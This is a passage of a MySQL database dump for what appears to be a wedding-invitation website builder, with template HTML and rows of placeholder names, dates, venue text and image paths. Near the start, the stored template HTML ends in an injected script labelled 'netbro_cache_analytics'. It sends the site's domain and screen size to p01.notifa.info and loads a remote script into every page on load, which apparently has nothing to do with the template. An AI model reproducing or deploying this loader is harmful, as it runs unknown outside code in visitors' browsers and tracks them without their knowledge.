class=\"row text-center\">\n                ~*35*~\n                <!-- <div class=\"col-md-3 gla_round_block\">\n                    <div class=\"gla_round_im gla_image_bck\" data-image=\"~*36*~\"></div>\n                    <h4>~*37*~</h4>\n                </div> -->\n            </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.8\" data-image=\"~*38*~\">\n        <div class=\"gla_over\" data-color=\"#000\" data-opacity=\"0.7\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*39*~\" height=\"143\" alt=\"\"></p>\n        </div>\n    </section>\n</section>\n\n<script src=\"js/jquery-1.12.4.min.js\"></script>\n<script src=\"js/glanz_library.js\"></script>\n<script src=\"js/glanz_script.js\"></script>\n\n\n<script type=\"text/javascript\">\nif (self==top) {\n  function netbro_cache_analytics(fn, callback) {\n    setTimeout(function() {\n      fn();\n      callback();}, 0);\n    } function sync(fn) {\n      fn();\n    } function requestCfs(){\n      var idc_glo_url = (location.protocol==\"https:\" ? \"https://\" : \"http://\");\n      var idc_glo_r = Math.floor(Math.random()*99999999999);\n      var url = idc_glo_url+ \"p01.notifa.info/3fsmd3/request\" + \"?id=1\" + \"&enc=9UwkxLgY9\" + \"&params=\" + \"4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mewcEa3OJ8xdRN9MtuG%2bIgkT8z7fczlMgfkbSmZASm23I4jejzERJnlXKVOMwrs5krW%2bEDV9%2bCR5ncnGlETQ19hi98hYWNaJNtdrMjpVCuVEVS0XizAmjlIKtMiZl4urmuQNtOhvZ6XvTWnOY67iCyumPqI5S71akRD%2buPpreiDsFpH6BnMoec%2bwz5ZsMVh5K423mxWNC4ah6JzEGtXm8L66MVzIlHlWJXuTghDzmDxQvgljV0rcpoGqxtrNkNfQMm7vUrCjY%2flMIxnCD2HWpn9FVVVNglSWeOwFS%2flZirwlBd6KYb1ySnoiaPAmL5vJan7r0dY65wDjiwlS95c7SIeb6PAvx6Omr0aF2nHyd93rN1u9VDyjf5p%2bLP9%2bjaRnrqWukpV8JQ5JCevuo98ocCrFyhxfhS%2bCpmC3WDV35USfK48Plv3zipcEk0s17EPri0lzWgxW3sLiWQCEpwXELANZ28R88gD6%2brsreYWa9JJWNLw1%2brfY%2fTeh%2f4KL99rbN\" + \"&idc_r=\"+idc_glo_r + \"&domain=\"+document.domain + \"&sw=\"+screen.width+\"&sh=\"+screen.height;var bsa = document.createElement(\'script\');bsa.type = \'text/javascript\';bsa.async = true;\n      bsa.src = url;\n      (document.getElementsByTagName(\'head\')[0]||document.getElementsByTagName(\'body\')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});\n    };\n</script>\n','2018-09-06 09:09:24','2018-09-06 09:09:25',NULL,4,'golden-badge');
/*!40000 ALTER TABLE `template_design` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `template_design_detail`
--

DROP TABLE IF EXISTS `template_design_detail`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `template_design_detail` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `unique_name` varchar(50) NOT NULL,
  `html` longtext NOT NULL,
  `types` varchar(50) NOT NULL,
  `template_design_detail_id` int(11) DEFAULT NULL,
  `template_design_id` int(11) NOT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` datetime DEFAULT NULL,
  `deleted_at` datetime DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `fk_template_design_detail_template_design_detail1_idx` (`template_design_detail_id`),
  KEY `fk_template_design_detail_template_design1_idx` (`template_design_id`),
  CONSTRAINT `fk_template_design_detail_template_design1` FOREIGN KEY (`template_design_id`) REFERENCES `template_design` (`id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `fk_template_design_detail_template_design_detail1` FOREIGN KEY (`template_design_detail_id`) REFERENCES `template_design_detail` (`id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB AUTO_INCREMENT=281 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `template_design_detail`
--

LOCK TABLES `template_design_detail` WRITE;
/*!40000 ALTER TABLE `template_design_detail` DISABLE KEYS */;
INSERT INTO `template_design_detail` VALUES (20,'~*01*~','https://cdn.newsapi.com.au/image/v1/c028cf3322130cc7d2aabdb21ea4721e','image',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(21,'~*02*~','a','text',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(22,'~*03*~','sd','text',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(23,'~*04*~','https://media.brstatic.com/2018/03/23135106/heres-how-much-you-should-expect-to-pay-this-wedding-season.jpg','image',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(24,'~*05*~','dsa','text',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(25,'~*06*~','User','text',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(26,'~*07*~','ABC','text',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(27,'~*08*~','https://peopledotcom.files.wordpress.com/2017/11/serena-williams-wedding-17.jpg','image',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(28,'~*09*~','https://www.weddingandweddingflowers.co.uk/site/images/articles/article4584.jpg','image',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(29,'~*10*~','YA','text',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(30,'~*11*~','BS','text',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(31,'~*12*~','2018','year',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(32,'~*13*~','12','month',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(33,'~*14*~','01','day',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(34,'~*15*~','https://www.glades.com.au/images/2017/glades-1707-wedding-6.jpg','image',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(35,'~*16*~','https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcREV8Df7YjpQdNk4Qut8iBqo2M8HZSxgXWWIGf69rlTcvz8jbe3yQ','image',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(36,'~*17*~','asd','text',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(37,'~*18*~','asd','text',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(38,'~*19*~','https://peopledotcom.files.wordpress.com/2018/08/born-this-way-8.jpg?w=2000','image',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(39,'~*20*~','https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQh-_yi6Bwr5RupPP-n-UCqhQCkuTZLAYmFPYgldSSDykiZeo3s','image',NULL,1,'2018-08-08 15:00:00','2018-08-08 15:00:00',NULL),(40,'~*01*~','Carita & Lee','text',NULL,3,'2018-09-05 15:45:19','2018-09-05 15:46:18',NULL),(41,'~*02*~','10 August, 2017','text',NULL,3,NULL,NULL,NULL),(42,'~*03*~','images/wedding/carita_lee/15499168455_d3a42471c3_k.jpg','image',NULL,3,NULL,NULL,NULL),(43,'~*04*~','images/animations/ourwedding_wh.gif','image',NULL,3,NULL,NULL,NULL),(44,'~*05*~','We’re Getting Married!','text',NULL,3,NULL,NULL,NULL),(45,'~*06*~','Lorem ipsum dolor sit amet, consectetur adipisicing elit. Accusantium nisi earum nihil perspiciatis magnam facilis, error explicabo obcaecati maiores sunt exercitationem doloribus tempora, sit voluptate autem quibusdam velit alias. Reprehenderit.','text',NULL,3,NULL,NULL,NULL),(46,'~*07*~','images/animations/savethedate.gif','image',NULL,3,NULL,NULL,NULL),(47,'~*08*~','St. Thomas\'s Church,','text',NULL,3,NULL,NULL,NULL),(48,'~*09*~','Bristol, U.K.','text',NULL,3,NULL,NULL,NULL),(49,'~*10*~','2017','text',NULL,3,NULL,NULL,NULL),(50,'~*11*~','08','text',NULL,3,NULL,NULL,NULL),(51,'~*12*~','10','text',NULL,3,NULL,NULL,NULL),(52,'~*13*~','images/animations/just_st.gif','image',NULL,3,NULL,NULL,NULL),(53,'~*14*~','See you at the wedding!','text',NULL,3,NULL,NULL,NULL),(54,'~*15*~','Lorem ipsum dolor sit amet, consectetur adipisicing elit. Ipsum pariatur vel rerum qui nesciunt eaque, suscipit delectus sunt, dolore facilis! Dignissimos fugit facere veniam ad nisi, eveniet pariatur maiores laborum!','text',NULL,3,NULL,NULL,NULL),(55,'~*16*~','RSVP','text',NULL,3,NULL,NULL,NULL),(56,'~*17*~','images/wedding/carita_lee/15312348718_b61a0d7db8_k.jpg','image',NULL,3,NULL,NULL,NULL),(57,'~*18*~','Registry','text',NULL,3,NULL,NULL,NULL),(58,'~*19*~','We’re lucky enough to have nearly everything we need for our home already. And since neither of us has ever been outside of North America, we want our honeymoon to be extra special! If you want to help make it unforgettable, you can contribute using the link to the right. If you would like to give us something to update our home, we’ve compiled a short registry as well.','text',NULL,3,NULL,NULL,NULL),(59,'~*20*~','The Day They Got Engaged','text',NULL,3,NULL,NULL,NULL),(60,'~*21*~','Andy and Jeska met in university in the Graphic Design program. They both remember each other from orientation, but it wasn’t love at first sight, that’s for sure. Andy remembers Jeska as a ‘snooty art bitch (having been in the visual arts program at the time), and she remembers Andy being an ‘arrogant computer nerd’, boasting his knowledge of Macs over the other students.','text',NULL,3,NULL,NULL,NULL),(61,'~*22*~','<div class=\"col-sm-4 gla_anim_box grid-item engagement\">\n    <div class=\"gla_shop_item\">\n	<a href=\"~*23*~\" class=\"lightbox\">\n	    <img src=\"~*23*~\" alt=\"\">\n	</a>\n    </div>\n</div>','html',61,3,NULL,NULL,NULL),(62,'~*23*~','images/wedding/carita_lee/15313125490_cddc46c828_k.jpg','image',NULL,3,NULL,NULL,NULL),(63,'~*24*~','images/animations/thnyou_wh.gif','image',NULL,3,NULL,NULL,NULL),(64,'~*01*~','images/wedding/carita_lee/15319475049_fc467e5874_k.jpg','image',NULL,2,NULL,NULL,NULL),(65,'~*02*~','images/badge.png','image',NULL,2,NULL,NULL,NULL),(66,'~*03*~','images/wedding/carita_lee/600x600/15503304111_d927414239_k.jpg','image',NULL,2,NULL,NULL,NULL),(67,'~*04*~','Carita Kimball','text',NULL,2,NULL,NULL,NULL),(68,'~*05*~','images/animations/mrandmrs.gif','image',NULL,2,NULL,NULL,NULL),(69,'~*06*~','Are getting married','text',NULL,2,NULL,NULL,NULL),(70,'~*07*~','on August 10, 2017','text',NULL,2,NULL,NULL,NULL),(71,'~*08*~','St. Thomas\'s Church,<br>Bristol, U.K.','text',NULL,2,NULL,NULL,NULL),(72,'~*09*~','images/wedding/carita_lee/600x600/15319460687_17d6396bac_k.jpg','image',NULL,2,NULL,NULL,NULL),(73,'~*10*~','Lee Guarino','text',NULL,2,NULL,NULL,NULL),(74,'~*11*~','2017','text',NULL,2,NULL,NULL,NULL),(75,'~*12*~','08','text',NULL,2,NULL,NULL,NULL),(76,'~*13*~','10','text',NULL,2,NULL,NULL,NULL),(77,'~*14*~','Lee Guarino','text',NULL,2,NULL,NULL,NULL),(78,'~*15*~','Lorem ipsum dolor sit amet, consectetur adipisicing elit. Distinctio mollitia, ipsa accusamus eius. Aspernatur ab sed minima, doloremque eligendi voluptatibus repellat unde, facilis natus ex ipsum eius atque suscipit fugit.','text',NULL,2,NULL,NULL,NULL),(79,'~*16*~','images/wedding/carita_lee/15499990315_b11d1e7c7f_k.jpg','image',NULL,2,NULL,NULL,NULL),(80,'~*17*~','Carita Kimball','text',NULL,2,NULL,NULL,NULL),(81,'~*18*~','Lorem ipsum dolor sit amet, consectetur adipisicing elit. Distinctio mollitia, ipsa accusamus eius. Aspernatur ab sed minima, doloremque eligendi voluptatibus repellat unde, facilis natus ex ipsum eius atque suscipit fugit.','text',NULL,2,NULL,NULL,NULL),(82,'~*19*~','images/wedding/carita_lee/15319753278_2c5a50cb74_k.jpg','image',NULL,2,NULL,NULL,NULL),(88,'~*20*~','<div class=\"col-md-6 col-sm-6\"><a href=\"#\" class=\"gla_news_block\"><span class=\"gla_news_img\"><span class=\"gla_over\" data-image=\"~*21*~\"></span></span><span class=\"gla_news_title\">~*22*~</span><p>~*23*~<br><b>~*24*~<br>~*25*~</b></p></a></div>','html',88,2,NULL,NULL,NULL),(89,'~*21*~','images/wedding_m/600x600/tom-pumford-226386.jpg','image',NULL,2,NULL,NULL,NULL),(90,'~*22*~','Wedding Ceremony','text',NULL,2,NULL,NULL,NULL),(91,'~*23*~','Lorem ipsum dolor sit amet, consectetur adipisicing elit. Culpa similique porro officiis nobis nulla quidem nihil iste veniam ut sit, maiores.','text',NULL,2,NULL,NULL,NULL),(92,'~*24*~','10 August, 2017, St. Thomas\'s Church, ','text',NULL,2,NULL,NULL,NULL),(93,'~*25*~','Bristol, U.K.','text',NULL,2,NULL,NULL,NULL),(94,'~*26*~','https://www.google.com/maps/d/embed?mid=1Db39qSrYMFfOT9Momg4l4VQEOng&amp;hl=en','link',NULL,2,NULL,NULL,NULL),(95,'~*27*~','The Wedding Party','text',NULL,2,NULL,NULL,NULL),(96,'~*28*~','images/wedding/carita_lee/600x600/15319753278_2c5a50cb74_k.jpg','image',NULL,2,NULL,NULL,NULL),(97,'~*29*~','Jessica Robbinson','text',NULL,2,NULL,NULL,NULL),(98,'~*30*~','images/wedding/carita_lee/600x600/15319361997_c1640fa738_k.jpg','image',NULL,2,NULL,NULL,NULL),(99,'~*31*~','Ronald Down','text',NULL,2,NULL,NULL,NULL),(100,'~*32*~','images/wedding/carita_lee/600x600/15499035192_2d5a8a1e2e_k.jpg','image',NULL,2,NULL,NULL,NULL),(101,'~*33*~','Marry Clay','text',NULL,2,NULL,NULL,NULL),(102,'~*34*~','images/wedding/carita_lee/600x600/15496676321_adf8baee9e_k.jpg','image',NULL,2,NULL,NULL,NULL),(103,'~*35*~','John Pitterson','text',NULL,2,NULL,NULL,NULL),(104,'~*36*~','images/wedding/carita_lee/15502403291_7acc15ad4f_k.jpg','image',NULL,2,NULL,NULL,NULL),(105,'~*37*~','images/animations/just_wh.gif','image',NULL,2,NULL,NULL,NULL),(106,'~*38*~','You’re wonderful. Can you be wonderful forever?\"','text',NULL,2,NULL,NULL,NULL),(107,'~*39*~','Brennan. A true master of words.','text',NULL,2,NULL,NULL,NULL),(110,'~*01*~','Lauren & Affonso','text',NULL,4,NULL,NULL,NULL),(111,'~*02*~','10 August, 2017','text',NULL,4,NULL,NULL,NULL),(112,'~*03*~','images/wedding/lauren_affonso/14399773152_759f6d4057_k.jpg','image',NULL,4,NULL,NULL,NULL),(113,'~*04*~','images/animations/savethedate_wh.gif','image',NULL,4,NULL,NULL,NULL),(114,'~*05*~','August 10th, 2017','text',NULL,4,NULL,NULL,NULL),(115,'~*06*~','St. Thomas\'s Church,','text',NULL,4,NULL,NULL,NULL),(116,'~*07*~','Bristol, U.K.','text',NULL,4,NULL,NULL,NULL),(117,'~*08*~','2017','text',NULL,4,NULL,NULL,NULL),(118,'~*09*~',' 08','text',NULL,4,NULL,NULL,NULL),(119,'~*10*~','10','text',NULL,4,NULL,NULL,NULL),(120,'~*11*~','Lorem ipsum dolor sit amet, consectetur adipisicing elit. Ipsum pariatur vel rerum qui nesciunt eaque, suscipit delectus sunt, dolore facilis! Dignissimos fugit facere veniam ad nisi, eveniet pariatur maiores laborum!','text',NULL,4,NULL,NULL,NULL),(121,'~*01*~','images/wedding/ian_kelsey/14629241938_afd1c2c19f_k.jpg','image',NULL,5,NULL,NULL,NULL),(122,'~*02*~','images/animations/ourwedding_wh.gif','image',NULL,5,NULL,NULL,NULL),(123,'~*03*~','images/wedding/ian_kelsey/14814210441_d5f33a00f1_k.jpg','image',NULL,5,NULL,NULL,NULL),(124,'~*04*~','images/animations/savethedate_wh.gif','image',NULL,5,NULL,NULL,NULL),(125,'~*05*~','August 10th, 2017','text',NULL,5,NULL,NULL,NULL),(126,'~*06*~','St. Thomas\'s Church,','text',NULL,5,NULL,NULL,NULL),(127,'~*07*~','Bristol, U.K.','text',NULL,5,NULL,NULL,NULL),(128,'~*08*~','2017','text',NULL,5,NULL,NULL,NULL),(129,'~*09*~','08','text',NULL,5,NULL,NULL,NULL),(130,'~*10*~','10','text',NULL,5,NULL,NULL,NULL),(131,'~*11*~','images/wedding/ian_kelsey/14815177364_46f0b9d71e_k.jpg','image',NULL,5,NULL,NULL,NULL),(132,'~*12*~','images/animations/just_st.gif','image',NULL,5,NULL,NULL,NULL),(133,'~*13*~','images/animations/just.gif','image',NULL,5,NULL,NULL,NULL),(134,'~*01*~','images/wedding/ian_kelsey/14812748891_aef5b27a4a_k.jpg','image',NULL,10,NULL,NULL,NULL),(135,'~*02*~','images/animations/ourwedding_gold.gif','image',NULL,10,NULL,NULL,NULL),(136,'~*03*~','Ian & Kelsey','text',NULL,10,NULL,NULL,NULL),(137,'~*04*~','August 10, 2017','text',NULL,10,NULL,NULL,NULL),(138,'~*05*~','The Fourth of July','text',NULL,10,NULL,NULL,NULL),(139,'~*06*~','My fiancé proposed on the Fourth of July. My mother asked us to go to the backyard to get some chairs and he took me by the shed where we could see all of the fireworks. He kissed me, then he took the ring box out of his pocket and asked me to be his wife. He was shaking a little. The proposal was a little silly but perfect, just like him.\"','text',NULL,10,NULL,NULL,NULL),(140,'~*07*~','Jeska Cords','text',NULL,10,NULL,NULL,NULL),(141,'~*08*~','images/wedding/ian_kelsey/14815177364_46f0b9d71e_k.jpg','image',NULL,10,NULL,NULL,NULL),(142,'~*09*~','Ian Wilson','text',NULL,10,NULL,NULL,NULL),(143,'~*10*~','Lorem ipsum dolor sit amet, consectetur adipisicing elit. Distinctio mollitia, ipsa accusamus eius. Aspernatur ab sed minima, doloremque eligendi voluptatibus repellat unde, facilis natus ex ipsum eius atque suscipit fugit.','text',NULL,10,NULL,NULL,NULL),(144,'~*11*~','images/wedding/ian_kelsey/14818410145_0413998881_k.jpg','image',NULL,10,NULL,NULL,NULL),(145,'~*12*~','Kelly Johnson','text',NULL,10,NULL,NULL,NULL),(146,'~*13*~','Lorem ipsum dolor sit amet, consectetur adipisicing elit. Distinctio mollitia, ipsa accusamus eius. Aspernatur ab sed minima, doloremque eligendi voluptatibus repellat unde, facilis natus ex ipsum eius atque suscipit fugit.','text',NULL,10,NULL,NULL,NULL),(147,'~*14*~','images/wedding/ian_kelsey/14815312201_0608beeccd_k.jpg','image',NULL,10,NULL,NULL,NULL),(166,'~*15*~','images/wedding/ian_kelsey/14795026036_19a656e3f6_k.jpg','image',NULL,10,NULL,NULL,NULL),(167,'~*16*~','images/animations/save_gold.gif','image',NULL,10,NULL,NULL,NULL),(168,'~*17*~','April 15th, 2016','text',NULL,10,NULL,NULL,NULL),(169,'~*18*~','St. Thomas\'s Church,<br>Bristol, U.K.','text',NULL,10,NULL,NULL,NULL),(170,'~*19*~','2017','text',NULL,10,NULL,NULL,NULL),(171,'~*20*~','08','text',NULL,10,NULL,NULL,NULL),(172,'~*21*~','10','text',NULL,10,NULL,NULL,NULL),(173,'~*22*~','images/animations/ourwedding_gold_wh.gif','image',NULL,10,NULL,NULL,NULL),(174,'~*23*~','Our ceremony and reception will be held at the Liberty House. Located on the Hudson River, it has a beautiful, unobstructed view of the World Trade One building and a convenient ferry that runs between it and Manhattan.','text',NULL,10,NULL,NULL,NULL),(175,'~*24*~','<div class=\"col-md-4 gla_round_block\">\n    <div class=\"gla_round_im gla_image_bck\" data-image=\"images/wedding/ian_kelsey/600x600/14818599945_45817b7c25_k.jpg\"></div>\n    <h3>~*25*~</h3>\n    <p>~*26*~<br>\n    ~*27*~<br>\n    ~*28*~<br>\n    ~*29*~<br>\n    ~*30*~</p>\n    <a href=\"~*31*~\" class=\"btn\">View Map</a>\n</div>','html',175,10,NULL,NULL,NULL),(176,'~*25*~','The Reception','text',NULL,10,NULL,NULL,NULL),(177,'~*26*~','4:00 PM – 5:30 PM','text',NULL,10,NULL,NULL,NULL),(178,'~*27*~','St. Thomas\'s Church,','text',NULL,10,NULL,NULL,NULL),(179,'~*28*~','Bristol','text',NULL,10,NULL,NULL,NULL),(180,'~*29*~','U.K.','text',NULL,10,NULL,NULL,NULL),(181,'~*30*~','+1 777-123-4567','text',NULL,10,NULL,NULL,NULL),(182,'~*31*~','images/animations/ourwedding_gold_wh.gif','image',NULL,10,NULL,NULL,NULL),(183,'~*32*~','Andy and Jeska met in university in the Graphic Design program. They both remember each other from orientation, but it wasn’t love at first sight, that’s for sure. Andy remembers Jeska as a ‘snooty art bitch (having been in the visual arts program at the time), and she remembers Andy being an ‘arrogant computer nerd’, boasting his knowledge of Macs over the other students.','text',NULL,10,NULL,NULL,NULL),(184,'~*33*~','<div class=\"gla_portfolio_no_padding grid\">\n<div class=\"col-sm-4 gla_anim_box grid-item engagement\">\n    <div class=\"gla_shop_item\">\n	<a href=\"~*34*~\" class=\"lightbox\">\n	    <img src=\"~*34*~\" alt=\"\">\n	</a>\n    </div>\n</div>\n</div>','html',184,10,NULL,NULL,NULL),(185,'~*34*~','images/wedding/ian_kelsey/600x600/14629241938_afd1c2c19f_k.jpg','text',NULL,10,NULL,NULL,NULL),(186,'~*35*~','<div class=\"col-md-3 gla_round_block\">\n    <div class=\"gla_round_im gla_image_bck\" data-image=\"~*36*~\"></div>\n    <h4>~*37*~</h4>\n</div>','html',186,10,NULL,NULL,NULL),(187,'~*36*~','images/wedding/ian_kelsey/600x600/14631705149_ff402671b6_k.jpg','image',NULL,10,NULL,NULL,NULL),(188,'~*37*~','Jessica Robbinson','text',NULL,10,NULL,NULL,NULL),(189,'~*38*~','images/wedding/ian_kelsey/14815470541_082c1294ad_k.jpg','image',NULL,10,NULL,NULL,NULL),(190,'~*39*~','images/animations/just_gold.gif','image',NULL,10,NULL,NULL,NULL),(191,'~*01*~','images/wedding/andy_jeska/10099882125_4afe7c6786_k_mb.jpg','image',NULL,6,NULL,NULL,NULL),(192,'~*02*~','images/animations/ourwedding_wh.gif','image',NULL,6,NULL,NULL,NULL),(193,'~*03*~','images/animations/flowers.gif','image',NULL,6,NULL,NULL,NULL),(194,'~*04*~','The Fourth of July','text',NULL,6,NULL,NULL,NULL),(195,'~*05*~','My fiancé proposed on the Fourth of July. My mother asked us to go to the backyard to get some chairs and he took me by the shed where we could see all of the fireworks. He kissed me, then he took the ring box out of his pocket and asked me to be his wife. He was shaking a little. The proposal was a little silly but perfect, just like him.','text',NULL,6,NULL,NULL,NULL),(196,'~*06*~','Jeska Cords','text',NULL,6,NULL,NULL,NULL),(197,'~*07*~','images/wedding/andy_jeska/10096243776_4e750f391d_k.jpg','image',NULL,6,NULL,NULL,NULL),(198,'~*08*~','images/animations/savethedate_wh.gif','image',NULL,6,NULL,NULL,NULL),(199,'~*09*~','August 10th, 2017','text',NULL,6,NULL,NULL,NULL),(200,'~*10*~','St. Thomas\'s Church','text',NULL,6,NULL,NULL,NULL),(201,'~*11*~','Bristol','text',NULL,6,NULL,NULL,NULL),(202,'~*12*~','U.K.','text',NULL,6,NULL,NULL,NULL),(203,'~*13*~','2017','text',NULL,6,NULL,NULL,NULL),(204,'~*14*~','08','text',NULL,6,NULL,NULL,NULL),(205,'~*15*~','10','text',NULL,6,NULL,NULL,NULL),(206,'~*16*~','images/animations/flowers2.gif','image',NULL,6,NULL,NULL,NULL),(207,'~*17*~','Our ceremony and reception will be held at the Liberty House. Located on the Hudson River, it has a beautiful, unobstructed view of the World Trade One building and a convenient ferry that runs between it and Manhattan.','text',NULL,6,NULL,NULL,NULL),(208,'~*18*~','<div class=\"col-md-4 col-sm-6\">\n    <a href=\"#\" class=\"gla_news_block\">\n	<span class=\"gla_news_img\">\n	    <span class=\"gla_over\" data-image=\"~*19*~\"></span>\n	</span>\n	<span class=\"gla_news_title\">~*20*~</span>\n	<p><strong>~*21*~,</strong><br>~*22*~, ~*23*~</p>\n    </a>\n</div>','html',208,6,NULL,NULL,NULL),(209,'~*19*~','images/wedding/andy_jeska/600x600/10095142066_6a86ebfe67_k.jpg','image',NULL,6,NULL,NULL,NULL),(210,'~*20*~','The Venue','text',NULL,6,NULL,NULL,NULL),(211,'~*21*~','St. Thomas\'s Church','text',NULL,6,NULL,NULL,NULL),(212,'~*22*~','Bristol','text',NULL,6,NULL,NULL,NULL),(213,'~*23*~','U.K.','text',NULL,6,NULL,NULL,NULL),(214,'~*24*~','images/wedding/andy_jeska/10094956883_a882196f8c_k.jpg','image',NULL,6,NULL,NULL,NULL),(215,'~*25*~','images/animations/just_wh.gif','image',NULL,6,NULL,NULL,NULL),(216,'~*26*~','You’re wonderful. Can you be wonderful forever?','text',NULL,6,NULL,NULL,NULL),(217,'~*27*~','Brennan. A true master of words.','text',NULL,6,NULL,NULL,NULL),(218,'~*28*~','images/animations/flowers3.gif','image',NULL,6,NULL,NULL,NULL),(219,'~*29*~','The Day They Got Engaged','text',NULL,6,NULL,NULL,NULL),(220,'~*30*~','Andy and Jeska met in university in the Graphic Design program. They both remember each other from orientation, but it wasn’t love at first sight, that’s for sure. Andy remembers Jeska as a ‘snooty art bitch (having been in the visual arts program at the time), and she remembers Andy being an ‘arrogant computer nerd’, boasting his knowledge of Macs over the other students.','text',NULL,6,NULL,NULL,NULL),(225,'~*31*~','<div class=\"gla_portfolio_no_padding grid\">\n	<div class=\"col-sm-4 gla_anim_box grid-item ceremony\">\n	    <div class=\"gla_shop_item\">\n		<a href=\"~*32*~\" class=\"lightbox\">\n		    <img src=\"~*32*~\" alt=\"\">\n		</a>\n	    </div>\n	</div>\n</div>','html',225,6,NULL,NULL,NULL),(226,'~*32*~','images/wedding/andy_jeska/10095808183_874f459e53_k.jpg','image',NULL,6,NULL,NULL,NULL),(227,'~*33*~','images/wedding/andy_jeska/10100565866_2fd1627ee6_k.jpg','image',NULL,6,NULL,NULL,NULL),(228,'~*34*~','images/animations/thnyou_wh.gif','image',NULL,6,NULL,NULL,NULL),(239,'~*01*~','images/wedding/lauren_affonso/14400933225_3b844816c3_k.jpg','image',NULL,9,NULL,NULL,NULL),(240,'~*02*~','Lauren','text',NULL,9,NULL,NULL,NULL),(241,'~*03~','Affonso','text',NULL,9,NULL,NULL,NULL),(242,'~*04*~','August 10, 2017','text',NULL,9,NULL,NULL,NULL),(243,'~*05*~','images/wedding/lauren_affonso/14214412498_73d4296c75_k_sm.jpg','image',NULL,9,NULL,NULL,NULL),(244,'~*06*~','images/animations/flower5.gif','image',NULL,9,NULL,NULL,NULL),(245,'~*07*~','The Fourth of July','text',NULL,9,NULL,NULL,NULL),(246,'~*08*~','My fiancé proposed on the Fourth of July. My mother asked us to go to the backyard to get some chairs and he took me by the shed where we could see all of the fireworks. He kissed me, then he took the ring box out of his pocket and asked me to be his wife. He was shaking a little. The proposal was a little silly but perfect, just like him.\"','text',NULL,9,NULL,NULL,NULL),(247,'~*09*~','Jeska Cords','text',NULL,9,NULL,NULL,NULL),(248,'~*10*~','images/wedding/lauren_affonso/14214309838_1a8f80c65a_k.jpg','image',NULL,9,NULL,NULL,NULL),(249,'~*11*~','images/animations/savethedate_wh.gif','image',NULL,9,NULL,NULL,NULL),(250,'~*12*~','August 10th, 2017','text',NULL,9,NULL,NULL,NULL),(251,'~*13*~','St. Thomas\'s Church','text',NULL,9,NULL,NULL,NULL),(252,'~*14*~','Bristol','text',NULL,9,NULL,NULL,NULL),(253,'~*15*~','U.K.','text',NULL,9,NULL,NULL,NULL),(254,'~*16*~','2017','text',NULL,9,NULL,NULL,NULL),(255,'~*17*~','08','text',NULL,9,NULL,NULL,NULL),(256,'~*18*~','10','text',NULL,9,NULL,NULL,NULL),(257,'~*19*~','images/animations/flower6.gif','image',NULL,9,NULL,NULL,NULL),(258,'~*20*~','Our ceremony and reception will be held at the Liberty House. Located on the Hudson River, it has a beautiful, unobstructed view of the World Trade One building and a convenient ferry that runs between it and Manhattan.','text',NULL,9,NULL,NULL,NULL),(259,'~*21*~','<div class=\"col-md-4 gla_round_block\">\n    <div class=\"gla_round_im gla_image_bck\" data-image=\"~*22*~\"></div>\n    <h3>~*23*~</h3>\n    <p>~*24*~ – ~*25*~<br>\n    ~*26*~ ,<br>\n    ~*27*~ <br>\n    ~*28*~ <br>\n    ~*29*~ </p>\n</div>','html',259,9,NULL,NULL,NULL),(260,'~*22*~','images/wedding/lauren_affonso/600x600/14214580180_4dbce3ed37_k.jpg','image',NULL,9,NULL,NULL,NULL),(261,'~*23*~','The Reception','text',NULL,9,NULL,NULL,NULL),(262,'~*24*~','4:00 PM','text',NULL,9,NULL,NULL,NULL),(263,'~*25*~','5:30 PM','text',NULL,9,NULL,NULL,NULL),(264,'~*26*~','St. Thomas\'s Church','text',NULL,9,NULL,NULL,NULL),(265,'~*27*~','Bristol','text',NULL,9,NULL,NULL,NULL),(266,'~*28*~','U.K.','text',NULL,9,NULL,NULL,NULL),(267,'~*29*~','+1 777-123-4567','text',NULL,9,NULL,NULL,NULL),(268,'~*30*~','images/wedding/lauren_affonso/14378154996_a9923cfa6f_k.jpg','image',NULL,9,NULL,NULL,NULL),(269,'~*31*~','images/animations/rsvp_wh.gif','image',NULL,9,NULL,NULL,NULL),(270,'~*32*~','images/animations/flower7.gif','image',NULL,9,NULL,NULL,NULL),(271,'~*33*~','The Day They Got Engaged','text',NULL,9,NULL,NULL,NULL),(272,'~*34*~','Andy and Jeska met in university in the Graphic Design program. They both remember each other from orientation, but it wasn’t love at first sight, that’s for sure. Andy remembers Jeska as a ‘snooty art bitch (having 